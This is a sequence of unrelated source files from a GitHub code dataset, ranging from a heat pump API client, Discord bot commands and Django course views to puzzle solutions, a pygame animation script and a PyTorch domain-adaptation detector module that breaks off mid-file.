###########################################################################\n\n @property\n def compressor_operational_time(self):\n return get_dict_value_safe(\n self.__get_operational_time_data_by_register_name(\n REG_OPER_TIME_COMPRESSOR),\n \"value\",\n )\n\n @property\n def hot_water_operational_time(self):\n return get_dict_value_safe(\n self.__get_operational_time_data_by_register_name(\n REG_OPER_TIME_HOT_WATER),\n \"value\",\n )\n\n @property\n def auxiliary_heater_1_operational_time(self):\n return get_dict_value_safe(\n self.__get_operational_time_data_by_register_name(\n REG_OPER_TIME_IMM1),\n \"value\",\n )\n\n @property\n def auxiliary_heater_2_operational_time(self):\n return get_dict_value_safe(\n self.__get_operational_time_data_by_register_name(\n REG_OPER_TIME_IMM2),\n \"value\",\n )\n\n @property\n def auxiliary_heater_3_operational_time(self):\n return get_dict_value_safe(\n self.__get_operational_time_data_by_register_name(\n REG_OPER_TIME_IMM3),\n \"value\",\n )\n\n ###########################################################################\n # Operation mode data\n ###########################################################################\n\n @property\n def operation_mode(self):\n return get_dict_value_safe(self.__group_operational_operation, \"current\")\n\n @property\n def available_operation_modes(self):\n return list(\n get_dict_value_safe(\n self.__group_operational_operation, \"available\", {}\n ).values()\n )\n\n @property\n def available_operation_mode_map(self):\n return get_dict_value_safe(self.__group_operational_operation, \"available\", {})\n\n @property\n def is_operation_mode_read_only(self):\n return get_dict_value_safe(self.__group_operational_operation, \"isReadOnly\")\n\n ###########################################################################\n # Hot water switch data\n ###########################################################################\n\n @property\n def is_hot_water_switch_available(self):\n return self.__group_hot_water is not None\n\n @property\n def hot_water_switch_state(self):\n return self.__group_hot_water\n\n 
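get_dict_value_safe is imported from ..utils.utils and not shown in this record. The properties above only need it to tolerate a None dict and a missing key, so a plausible minimal form (an assumption about the helper, not the project's actual code) would be:

def get_dict_value_safe(dictionary, key, default=None):
    # Assumed helper: behave like dict.get(), but also tolerate dictionary=None,
    # which happens when a register group is missing for this heat pump model.
    if dictionary is None:
        return default
    return dictionary.get(key, default)

assert get_dict_value_safe(None, "value") is None
assert get_dict_value_safe({"value": 21.5}, "value") == 21.5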
###########################################################################\n # Alarm data\n ###########################################################################\n\n @property\n def active_alarm_count(self):\n active_alarms = self.__get_active_alarms()\n return len(list(active_alarms))\n\n @property\n def active_alarms(self):\n active_alarms = self.__get_active_alarms()\n active_alarm_texts = map(\n lambda alarm: alarm.get(\"eventTitle\"), active_alarms)\n return list(active_alarm_texts)\n\n ###########################################################################\n # Historical data\n ###########################################################################\n\n @property\n def historical_data_registers(self):\n if self.__historical_data_registers_map is None:\n self.__set_historical_data_registers()\n\n return list(self.__historical_data_registers_map.keys())\n\n def get_historical_data_for_register(\n self, register_name, start_date: datetime, end_date: datetime\n ):\n if self.__historical_data_registers_map is None:\n self.__set_historical_data_registers()\n\n register_id = self.__historical_data_registers_map.get(register_name)\n\n if register_id is None:\n self._LOGGER.error(\n \"Register name is not supported: \" + str(register_name))\n return None\n\n historical_data = self.__api_interface.get_historical_data(\n self.__device_id,\n register_id,\n start_date.strftime(DATETIME_FORMAT),\n end_date.strftime(DATETIME_FORMAT),\n )\n\n if historical_data is None or historical_data.get(\"data\") is None:\n return []\n\n return list(\n map(\n lambda entry: {\n \"time\": datetime.strptime(\n entry[\"at\"].split(\".\")[0], DATETIME_FORMAT\n ),\n \"value\": int(entry[\"val\"]),\n },\n historical_data[\"data\"],\n )\n )\n\n ###########################################################################\n # Print debug data\n ###########################################################################\n\n def debug(self):\n print(\"Creating debug file\")\n\n original_stdout = sys.stdout\n f = open(\"debug.txt\", \"w\")\n sys.stdout = f\n\n print(\"########## DEBUG START ##########\")\n\n print(\"self.__info:\")\n pretty_print_except(self.__info, [\"address\", \"macAddress\", \"ownerId\",\n \"retailerAccess\", \"retailerId\", \"timeZoneId\", \"id\", \"hasUserAccount\"])\n\n print(\"self.__status:\")\n pretty_print_except(self.__status)\n\n print(\"self.__device_data:\")\n pretty_print_except(self.__device_data, [\n \"macAddress\", \"owner\", \"retailerAccess\", \"retailerId\", \"id\", \"status\"])\n\n print(\"self.__group_temperatures:\")\n pretty_print_except(self.__group_temperatures)\n\n installation_profile_id = self.__info.get(\"installationProfileId\")\n\n if installation_profile_id is not None:\n all_available_groups = self.__api_interface.get_all_available_groups(\n installation_profile_id)\n if all_available_groups is not None:\n print(\"All available groups:\")\n pretty_print_except(all_available_groups)\n\n for group in all_available_groups:\n group_name = group.get(\"name\")\n if group_name is not None:\n print(\"Group \" + group_name + \":\")\n group_data = self.__api_interface.get_register_group_json(\n self.__device_id, group_name)\n pretty_print_except(group_data)\n\n print(\"########## DEBUG END ##########\")\n\n sys.stdout = original_stdout\n f.close()\n print(\"Debug file 
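debug() swaps sys.stdout by hand and only restores it at the end, so an exception in between would leave stdout captured. contextlib gives the same capture with guaranteed restoration. A sketch of the safer idiom, not a change to the class itself:

import contextlib

def write_debug_report(path: str = "debug.txt") -> None:
    # redirect_stdout restores sys.stdout even if the body raises.
    with open(path, "w") as f, contextlib.redirect_stdout(f):
        print("########## DEBUG START ##########")
        print("########## DEBUG END ##########")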
created\")\n","repo_name":"LeoThorsell/python-thermia-online-api","sub_path":"ThermiaOnlineAPI/model/HeatPump.py","file_name":"HeatPump.py","file_ext":"py","file_size_in_byte":18439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"5200740381","text":"import interactions, utils, json\n\nSUGGESTIONS_FILE = \"commands/suggestions.json\"\n\nwith open(SUGGESTIONS_FILE, \"r\") as f:\n suggestions = json.load(f)\n\nsuggestion_choices = []\n\nfor i in suggestions:\n suggestion_choices.append(interactions.Choice(name = i[\"title\"], value = i[\"title\"]))\n\ndel suggestions\n\nsuggestion_statuses = [\"New\", \"In progress\", \"Closed\"]\nsuggestion_status_choices = []\nfor i in suggestion_statuses:\n suggestion_status_choices.append(interactions.Choice(name = i, value = i))\n\nclass SuggestionCommands (interactions.Extension):\n def __init(self, client):\n self.client = client\n\n async def status (self, ctx : interactions.CommandContext, kwargs):\n if ctx.author.user.id != utils.ids.XOROL:\n await ctx.send(\"You're not Xorol, only he can use this command!\", ephemeral = True)\n return\n\n title = kwargs[\"suggestion\"]\n new_status = kwargs[\"status\"]\n\n with open(SUGGESTIONS_FILE, \"r\") as f:\n suggestions = json.load(f)\n\n found = False\n for i, j in enumerate(suggestions):\n if j[\"title\"] == title:\n j[\"status\"] = new_status\n suggestions[i] = j\n found = True\n break\n\n if not found:\n await ctx.send(\"You somehow picked a suggestion that doesn't exist...\")\n return\n\n del found\n\n with open(SUGGESTIONS_FILE, \"w\") as f:\n json.dump(suggestions, f)\n\n await ctx.send(f\"{title}'s status has now been updated to {new_status}!\", ephemeral = True)\n\n async def suggest (self, ctx : interactions.CommandContext, kwargs):\n title = kwargs[\"title\"]\n reserved_names = [\"all\", \"View all suggestions\"]\n if title in reserved_names:\n await ctx.send(f\"Sorry, '{title}' is a reserved title, used for differentiating suggestions from the 'View all suggestions' option in the `/suggestion view` command\")\n return\n \n desc = kwargs[\"description\"]\n author = ctx.author.user\n\n with open(SUGGESTIONS_FILE, \"r\") as f:\n suggestions = json.load(f)\n\n suggestions.append({\n \"title\":title,\n \"description\":desc,\n \"author\":int(author.id),\n \"status\":\"New\"\n })\n\n with open(SUGGESTIONS_FILE, \"w\") as f:\n json.dump(suggestions, f)\n\n await ctx.send(\"Your suggestion has been saved!\")\n\n async def view (self, ctx : interactions.CommandContext, kwargs):\n with open(SUGGESTIONS_FILE, \"r\") as f:\n suggestions = json.load(f)\n\n suggestion = kwargs[\"suggestion\"]\n\n if suggestion == \"all\":\n if len(suggestions) == 0:\n await ctx.send(\"There are no suggestions. 
You can fix that by suggesting something!\")\n return\n \n out = \"Here's all current suggestions!\"\n for i in suggestions:\n out += \"\\n> \" + i[\"title\"]\n\n await ctx.send(out)\n return\n\n found = False\n for i, j in enumerate(suggestions):\n if j[\"title\"] == suggestion:\n suggestion = j\n found = True\n break\n\n if not found:\n await ctx.send(\"You somehow picked a suggestion that doesn't exist...\")\n return\n\n del found\n\n author = await utils.bot.get_user(suggestion[\"author\"], self.client)\n\n embedi = interactions.Embed(\n title = j[\"title\"],\n description = j[\"description\"],\n fields = [\n interactions.EmbedField(name = \"Suggested by\", value = author.username),\n interactions.EmbedField(name = \"Status\", value = suggestion[\"status\"])\n ]\n )\n await ctx.send(embeds = embedi)\n\n @interactions.extension_command(\n name = \"suggestion\",\n description = \"secret desc lol\",\n scope = utils.ids.KOILANG,\n options = [\n interactions.Option(\n name = \"suggest\",\n description = \"Suggest something to be added to Rushk!\",\n type = interactions.OptionType.SUB_COMMAND,\n options = [\n interactions.Option(\n name = \"title\",\n description = \"The title of your suggestion\",\n type = interactions.OptionType.STRING,\n required = True\n ),\n interactions.Option(\n name = \"description\",\n description = \"The description of your suggestion\",\n type = interactions.OptionType.STRING,\n required = True\n )\n ]\n ),\n interactions.Option(\n name = \"set_status\",\n description = \"Updates the status of a suggestion\",\n type = interactions.OptionType.SUB_COMMAND,\n options = [\n interactions.Option(\n name = \"suggestion\",\n description = \"The suggestion to update the status of\",\n type = interactions.OptionType.STRING,\n required = True,\n choices = suggestion_choices\n ),\n interactions.Option(\n name = \"status\",\n description = \"The new status\",\n type = interactions.OptionType.STRING,\n required = True, \n choices = suggestion_status_choices\n )\n ]\n ),\n interactions.Option(\n name = \"view\",\n description = \"See one or all suggestions currently submitted!\",\n type = interactions.OptionType.SUB_COMMAND,\n options = [\n interactions.Option(\n name = \"suggestion\",\n description = \"The suggestion to view\",\n type = interactions.OptionType.STRING,\n required = True,\n choices = suggestion_choices + [interactions.Choice(name=\"View all suggestions\", value = \"all\")]\n )\n ]\n )\n ]\n )\n async def suggestion_master_command (self, ctx : interactions.CommandContext, sub_command,**kwargs):\n if sub_command == \"suggest\":\n await self.suggest(ctx, kwargs)\n elif sub_command == \"set_status\":\n await self.status(ctx, kwargs)\n elif sub_command == \"view\":\n await self.view(ctx, kwargs)\n\ndef setup(client):\n SuggestionCommands(client)","repo_name":"Xorol/rushk","sub_path":"commands/suggestions.py","file_name":"suggestions.py","file_ext":"py","file_size_in_byte":5820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28180068202","text":"class Solution(object):\n def sumEvenAfterQueries(self, nums, queries):\n \"\"\"\n :type nums: List[int]\n :type queries: List[List[int]]\n :rtype: List[int]\n \"\"\"\n # Time Complexity: O(n^2) Space: O(n)\n res = []\n\n for i in range(len(queries)):\n index = queries[i][1]\n nums[index] = nums[index] + queries[i][0]\n idx = 0\n sums = 0\n\n while idx < len(nums):\n if nums[idx] % 2 == 0:\n sums += nums[idx]\n\n idx += 1\n\n res.append(sums)\n\n if len(res) == 0:\n 
res.append(0)\n\n return res\n\n\n","repo_name":"boshika/cs-ds-prep","sub_path":"leetcode/ Sum_of_Even_Numbers_After_Queries.py","file_name":" Sum_of_Even_Numbers_After_Queries.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32834736466","text":"from fuzzywuzzy import fuzz\n\n#throw out words with the highest frequency\nstop_words = [\n 'brokerage',\n 'corp',\n 'corporate',\n 'advisor',\n 'commercial',\n 'investment',\n 'organization',\n 'enterpises',\n 'holding',\n 'development',\n 'management',\n 'commercial',\n 'realty',\n 'estate',\n 'group',\n 'properties',\n 'company',\n 'associates',\n 'partners',\n 'inc',\n 'co',\n 'services',\n 'llc',\n 'property',\n]\nall_words = [word for sub_list in [item.split() for item in list(corpus)] for word in sub_list]\nfrom collections import defaultdict\n\nsome_dict = defaultdict(list)\nthreshold_value = 75\nfor word in stop_words:\n for curr_word in all_words:\n if fuzz.ratio(word, curr_word) > threshold_value:\n some_dict[word].append(curr_word)\n","repo_name":"asharma567/deduping_and_fuzzy_matching","sub_path":"stop_word_generator.py","file_name":"stop_word_generator.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14857541857","text":"#_*_encoding:utf-8_*_\nfrom django.shortcuts import render\nfrom django.views.generic import View\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\nfrom django.db.models import Q\n\n\nfrom .models import Course,Video\nfrom operation.models import UserFavorite,UserCourse,CourseComments\n\n# Create your views here.\nclass CourseView(View):\n def get(self,request):\n all_courses=Course.objects.all().order_by(\"add_time\")\n\n #课程搜索\n search_keywords=request.GET.get('keywords', \"\")\n if search_keywords:\n #i 不区分大小写\n all_courses=all_courses.filter(Q(name__icontains=search_keywords)|Q(des__icontains=search_keywords)|Q(detail__icontains=search_keywords))\n\n sort = request.GET.get('sort', \"\")\n if sort:\n if sort == \"hot\":\n all_courses = all_courses.order_by(\"-click_nums\")\n elif sort == \"students\":\n all_courses = all_courses.order_by(\"-students\")\n\n # 课程计数\n course_nums = all_courses.count()\n\n # 热门课程\n hot_courses = Course.objects.all().order_by(\"-click_nums\")[:3]\n\n # 对课程进行分页\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n\n # Provide Paginator with the request object for complete querystring generation\n\n p = Paginator(all_courses, 3, request=request)\n\n courses = p.page(page)\n\n\n return render(request,\"course-list.html\",{\n 'sa':'course',\n 'all_courses':courses,\n 'hot_courses':hot_courses,\n 'sort':sort\n })\n\n\nclass CourseDetailView(View):\n def get(self,request,course_id):\n course=Course.objects.get(id=int(course_id))\n\n #点击数逻辑\n course.click_nums=course.click_nums+1\n course.save()\n\n #我要学习\n msg='我要学习'\n if request.user.is_authenticated():\n if UserCourse.objects.filter(user=request.user,course=course):\n msg='正在学习'\n\n #课程机构收藏显示\n org_msg=\"收藏\"\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course.course_org.id,fav_type=2):\n org_msg=\"已收藏\"\n\n\n course_msg = \"收藏\"\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course.id, fav_type=1):\n course_msg = \"已收藏\"\n\n #推荐课程\n 
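The sumEvenAfterQueries solution above rescans nums after every query, which is O(n * q) overall. Maintaining one running even sum brings it to O(n + q). A sketch of that approach (not the repo's code), verified against the standard example:

def sum_even_after_queries(nums, queries):
    even_sum = sum(x for x in nums if x % 2 == 0)
    out = []
    for val, idx in queries:
        if nums[idx] % 2 == 0:       # old value leaves the even sum
            even_sum -= nums[idx]
        nums[idx] += val
        if nums[idx] % 2 == 0:       # new value may rejoin it
            even_sum += nums[idx]
        out.append(even_sum)
    return out

assert sum_even_after_queries([1, 2, 3, 4], [[1, 0], [-3, 1], [-4, 0], [2, 3]]) == [8, 6, 2, 4]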
relate_courses=[]\n tag=course.tag\n if tag:\n relate_courses=Course.objects.filter(tag=tag)\n relate_courses=relate_courses.exclude(id=course_id)\n\n return render(request,'course-detail.html',{\n 'course':course,\n 'course_id':course_id,\n 'course_msg':course_msg,\n 'org_msg':org_msg,\n 'msg':msg,\n 'related_courses':relate_courses,\n 'sa':'course'\n })\n\n\nclass AddLearnView(View):\n\n def post(self,request):\n user_id=request.user.id\n course_id = request.POST.get('course_id', 0)\n\n course = Course.objects.get(id=course_id)\n\n #增加学习课程的数据记录\n if request.user.is_authenticated():\n user_course=UserCourse()\n\n #判断是否存在记录\n exist_records = UserCourse.objects.filter(user_id=int(user_id), course_id=int(course_id))\n if not exist_records:\n user_course.user_id=user_id\n user_course.course_id=course_id\n user_course.save()\n #更新课程学习人数\n students=UserCourse.objects.filter(course_id=int(course_id)).count()\n course.students=students\n course.save()\n\n return HttpResponse('{\"status\":\"transfer\",\"msg\":\"正在学习\"}', content_type='application/json')\n else:\n exist_records.delete()\n\n # 更新课程学习人数\n students = UserCourse.objects.filter(course_id=int(course_id)).count()\n course.students = students\n course.save()\n\n return HttpResponse('{\"status\":\"concel\",\"msg\":\"我要学习\"}', content_type='application/json')\n\n\n else:\n return HttpResponse('{\"status\":\"fail\",\"msg\":\"用户未登录\"}', content_type='application/json')\n\n\nclass CourseVideoView(View):\n def get(self,request,course_id):\n course = Course.objects.get(id=course_id)\n return render(request,'course-video.html',{\n 'course':course,\n 'comment_or_video': \"video\",\n 'sa':'course'\n })\n\n\nclass CourseCommentView(View):\n def get(self,request,course_id):\n course=Course.objects.get(id=course_id)\n all_comments=course.coursecomments_set.all()\n return render(request,'course-comment.html',{\n 'course':course,\n 'comment_or_video':\"comment\",\n 'sa':'course',\n 'all_comments':all_comments\n })\n\n\nclass AddCommentView(View):\n def post(self,request):\n course_id=request.POST.get('course_id',\"0\")\n comments=request.POST.get('comments',\"\")\n\n if request.user.is_authenticated():\n course_comments=CourseComments()\n course_comments.course_id=course_id\n course_comments.user_id=request.user.id\n course_comments.comments=comments\n course_comments.save()\n return HttpResponse('{\"status\":\"success\",\"msg\":\"评论成功\"}', content_type='application/json')\n\n else:\n return HttpResponse('{\"status\":\"success\",\"msg\":\"用户未登陆\"}', content_type='application/json')\n\n\nclass VideoView(View):\n def get(self,request,video_id):\n if request.user.is_authenticated():\n video=Video.objects.get(id=video_id)\n course=video.lesson.course\n if UserCourse.objects.filter(user=request.user,course=course):\n return render(request,'video_things.html',{\n 'video_url':video.video_url\n })","repo_name":"mimota1994/MxOnline","sub_path":"apps/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17185440888","text":"import sys\r\n\r\n\r\ndef back_tracking(idx):\r\n ans.append(int(idx))\r\n for j in range(0, int(idx[-1])):\r\n back_tracking(idx + str(j))\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n\r\n n = int(input())\r\n\r\n ans = []\r\n\r\n if n > 1022:\r\n print(-1)\r\n else:\r\n for i in range(10):\r\n back_tracking(str(i))\r\n\r\n 
print(sorted(ans)[n])","repo_name":"parkchanbin54/boj","sub_path":"백준/Gold/1038. 감소하는 수/감소하는 수.py","file_name":"감���하는 수.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73962136570","text":"# skeleton code for project 2\n# vis 142 fall 2022 \n# This can take 20 minutes to hours to run.\n\nimport pygame\nfrom pygame.locals import *\nfrom sys import exit\nimport random\nimport time\nimport animation\n\nstart_time = time.time()\n\nwidth = 1920 \nheight = 1080 \nclock = pygame.time.Clock()\npygame.init()\nscreen = pygame.display.set_mode((width, height))\nscreen.fill((0,0,0))\nframe_num = 0\n\n# this function makes one second of black frames\ndef make_black():\n global frame_num\n screen.fill((0,0,0))\n pygame.display.update()\n for i in range(0, 60):\n # pygame.image.save(screen, \"./frames/\" + str(frame_num) + \".png\")\n frame_num = frame_num + 1\n clock.tick(60)\n \nframes = [pygame.image.load(\"1.png\"), pygame.image.load(\"2.png\"), pygame.image.load(\"3.png\"), pygame.image.load(\"4.png\")]\nframeTime = [8,6,9,11]\nrepeat = True\n\nframes = [pygame.image.load(\"1.png\"), pygame.image.load(\"2.png\"), pygame.image.load(\"3.png\"), pygame.image.load(\"4.png\")]\nframeTime = [2,2,2,2]\nrepeat = True\n\nanim = animation.animation(frames, frameTime, repeat)\nx = 200\n# here is the main animation loop\nfor i in range(0, 20*60): # 20*60 frames is 20 seconds\n #########################################################\n # in the skeleton, your animation goes from here ########\n #########################################################\n \n anim.update(screen, pygame.Rect(x,200,10,10))\n x = x + 1\n #########################################################\n # to here ###############################################\n #########################################################\n # print out stats\n \n # The next line can be commented out to speed up testing frame rate\n # by not writing the file. But for output to final frames,\n # you will need to ucomment it.\n # pygame.image.save(screen, \"./frames/\" + str(frame_num) + \".png\")\n frame_num = frame_num + 1\n pygame.display.update()\n clock.tick(60)\n\n# print out stats\nprint(\"seconds:\", int(time.time() - start_time))\nprint(\"~minutes: \", int((time.time() - start_time)/60))\nprint(frame_num)\n# we just quit here\npygame.display.quit()\npygame.quit()\nexit()\n\n# you can make your files into a movie with ffmpeg:\n# ffmpeg -r 60 -start_number 1000000 -s 4096x2160 -i %d.png -vcodec libx264 -crf 5 -pix_fmt yuv420p final.mp4\n# with a few changes such as to start number, but this is just extra info here\n","repo_name":"Jackcool81/animation1","sub_path":"skel.py","file_name":"skel.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18721616499","text":"\"\"\"Manages the configuration file for the entire application. 
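The 1022 cut-off in the backtracking solution above comes from a counting fact: every nonempty subset of the digits 0-9, written in descending order, is exactly one "decreasing number", so there are 2**10 - 1 = 1023 of them, indexed 0 through 1022. A sketch generating them directly instead of recursing:

from itertools import combinations

decreasing = sorted(
    int("".join(map(str, sorted(combo, reverse=True))))
    for r in range(1, 11)
    for combo in combinations(range(10), r)
)
assert len(decreasing) == 1023
assert decreasing[:11] == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]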
By default,\nthe applications configuration file name is 'config.int'.\nPerforms basic error checking on the configuration file as well.\n\"\"\"\nimport pathlib\nimport configparser\nfrom typing import Optional\n\nCONFIG_FILENAME = 'config.ini'\n\n\nclass DiscordConfig:\n \"\"\"Configuration Settings for Discords API.\"\"\"\n\n def __init__(self, config: configparser.SectionProxy) -> None:\n self._config = config\n\n @property\n def token(self) -> str:\n \"\"\"Token for access to Discord API.\n Default: unset\n \"\"\"\n val = self._config.get('Token', fallback='unset')\n if not val:\n return \"unset\"\n return val\n\n @property\n def prefix(self) -> str:\n \"\"\"Command prefix for the bot to register what is a command.\n Default: [\n \"\"\"\n val = self._config.get('Prefix', fallback='[')\n if val is None or val == \"\":\n return '['\n return val\n\n @property\n def owner_id(self) -> int:\n \"\"\"Owner of the bots Discord ID, it is most likely a large integer.\n Default: 0\n \"\"\"\n return self._config.getint('OwnerId', 0)\n\n @property\n def ccserver_dm_id(self) -> int:\n \"\"\"DM Channel ID of the bots command server.\n Default: 0\n \"\"\"\n return self._config.getint('CCDMId', 0)\n\n\nclass GeneralConfig:\n \"\"\"General configurations, parent to all sub-configurations.\"\"\"\n\n def __init__(self, config: configparser.ConfigParser) -> None:\n self._config = config\n\n # Throw an error since Discord config is essential for running.\n if not config.has_section('DISCORD'):\n raise ValueError(\"'DISCORD' is unset in configuration file.\")\n self._discord = DiscordConfig(config['DISCORD'])\n\n @property\n def discord(self) -> DiscordConfig:\n \"\"\"Discord configurations.\"\"\"\n return self._discord\n\n @property\n def debug(self) -> bool:\n \"\"\"Controls if the program is running in DEBUG mode.\n Default: 'False'\n \"\"\"\n return self._config.getboolean('DEFAULT', 'Debug', fallback=False)\n\n @staticmethod\n def make_default_config() -> bool:\n \"\"\"Creates a default configuration for the application. 
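The getters above all follow the same fallback discipline. The core configparser calls, shown standalone with an in-memory config string (section and option names copied from the class, the values invented):

import configparser

config = configparser.ConfigParser()
config.read_string("[DISCORD]\nToken = unset\nOwnerId = 42\n")

section = config["DISCORD"]
assert section.get("Prefix", fallback="[") == "["        # missing key -> fallback
assert config.getint("DISCORD", "OwnerId", fallback=0) == 42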
The file will\n be titled CONFIG_FILENAME ('config.ini' by default.)\n \"\"\"\n # If the file exists ignore.\n if pathlib.Path(CONFIG_FILENAME).is_file():\n return False\n\n # Initialize each category and the default values.\n config = configparser.ConfigParser()\n config['DEFAULT'] = {}\n config['DEFAULT']['Debug'] = 'False'\n config['DISCORD'] = {}\n config['DISCORD']['Token'] = 'unset'\n config['DISCORD']['Prefix'] = '['\n config['DISCORD']['OwnerId'] = '0'\n config['DISCORD']['CCDMId'] = '0'\n\n # Save it locally.\n with open(CONFIG_FILENAME, 'w', encoding='utf-8') as configfile:\n config.write(configfile)\n return True\n\n @staticmethod\n def load_config() -> Optional['GeneralConfig']:\n \"\"\"Attempts to load the local configuration file into memory.\"\"\"\n # Cannot load a non-existing file.\n if not pathlib.Path(CONFIG_FILENAME).is_file():\n return None\n\n config = configparser.ConfigParser()\n config.read(CONFIG_FILENAME)\n\n if not config.has_section('DISCORD'):\n raise ValueError(\"'DISCORD' section missing from configuration.\")\n\n try:\n token = config.get('DISCORD', 'Token', fallback='unset')\n if token == 'unset':\n raise ValueError()\n except (ValueError, Exception) as err:\n raise ValueError(\"invalid values in configuration file.\") from err\n return GeneralConfig(config)\n","repo_name":"Ohkthx/uboot","sub_path":"uboot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"41279596040","text":"# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Xinlei Chen\n# --------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport math\nimport torchvision.models as models\nfrom model.faster_rcnn.faster_rcnn_SCL import _fasterRCNN\n#from model.faster_rcnn.faster_rcnn_imgandpixellevel_gradcam import _fasterRCNN\nfrom model.utils.config import cfg\n\nimport pdb\ndef conv3x3(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\ndef conv1x1(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride,\n padding=0, bias=False)\n\nclass netD_forward1(nn.Module):\n def __init__(self):\n super(netD_forward1, self).__init__()\n self.conv1 = nn.Conv2d(256, 256, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv2 = nn.Conv2d(256, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv3 = nn.Conv2d(128, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self._init_weights()\n def _init_weights(self):\n def normal_init(m, mean, stddev, truncated=False):\n \"\"\"\n weight initalizer: truncated normal and random normal.\n \"\"\"\n # x is a parameter\n if truncated:\n m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation\n else:\n m.weight.data.normal_(mean, stddev)\n #m.bias.data.zero_()\n normal_init(self.conv1, 0, 0.01)\n normal_init(self.conv2, 0, 0.01)\n normal_init(self.conv3, 0, 0.01)\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = 
F.relu(self.conv3(x))\n feat = F.avg_pool2d(x, (x.size(2), x.size(3)))\n return feat\n\nclass netD_forward2(nn.Module):\n def __init__(self):\n super(netD_forward2, self).__init__()\n self.conv1 = nn.Conv2d(512, 256, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv2 = nn.Conv2d(256, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv3 = nn.Conv2d(128, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self._init_weights()\n def _init_weights(self):\n def normal_init(m, mean, stddev, truncated=False):\n \"\"\"\n weight initalizer: truncated normal and random normal.\n \"\"\"\n # x is a parameter\n if truncated:\n m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation\n else:\n m.weight.data.normal_(mean, stddev)\n #m.bias.data.zero_()\n normal_init(self.conv1, 0, 0.01)\n normal_init(self.conv2, 0, 0.01)\n normal_init(self.conv3, 0, 0.01)\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = F.relu(self.conv3(x))\n feat = F.avg_pool2d(x, (x.size(2), x.size(3)))\n return feat\n\nclass netD_forward3(nn.Module):\n def __init__(self):\n super(netD_forward3, self).__init__()\n self.conv1 = nn.Conv2d(512, 256, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv2 = nn.Conv2d(256, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.conv3 = nn.Conv2d(128, 128, kernel_size=3, stride=1,\n padding=1, bias=False)\n self._init_weights()\n def _init_weights(self):\n def normal_init(m, mean, stddev, truncated=False):\n \"\"\"\n weight initalizer: truncated normal and random normal.\n \"\"\"\n # x is a parameter\n if truncated:\n m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation\n else:\n m.weight.data.normal_(mean, stddev)\n #m.bias.data.zero_()\n normal_init(self.conv1, 0, 0.01)\n normal_init(self.conv2, 0, 0.01)\n normal_init(self.conv3, 0, 0.01)\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = F.relu(self.conv3(x))\n feat = F.avg_pool2d(x, (x.size(2), x.size(3)))\n return feat\n\n\nclass netD_inst(nn.Module):\n def __init__(self, fc_size=2048):\n super(netD_inst, self).__init__()\n self.fc_1_inst = nn.Linear(fc_size, 1024)\n self.fc_2_inst = nn.Linear(1024, 256)\n self.fc_3_inst = nn.Linear(256, 2)\n self.relu = nn.ReLU(inplace=True)\n #self.softmax = nn.Softmax()\n #self.logsoftmax = nn.LogSoftmax()\n # self.bn = nn.BatchNorm1d(128)\n self.bn2 = nn.BatchNorm1d(2)\n\n def forward(self, x):\n x = self.relu(self.fc_1_inst(x))\n x = self.relu((self.fc_2_inst(x)))\n x = self.relu(self.bn2(self.fc_3_inst(x)))\n return x\n\nclass netD1(nn.Module):\n def __init__(self,context=False):\n super(netD1, self).__init__()\n self.conv1 = nn.Conv2d(256, 256, kernel_size=1, stride=1,\n padding=0, bias=False)\n self.conv2 = nn.Conv2d(256, 128, kernel_size=1, stride=1,\n padding=0, bias=False)\n self.conv3 = nn.Conv2d(128, 1, kernel_size=1, stride=1,\n padding=0, bias=False)\n self.context = context\n self._init_weights()\n def _init_weights(self):\n def normal_init(m, mean, stddev, truncated=False):\n \"\"\"\n weight initalizer: truncated normal and random 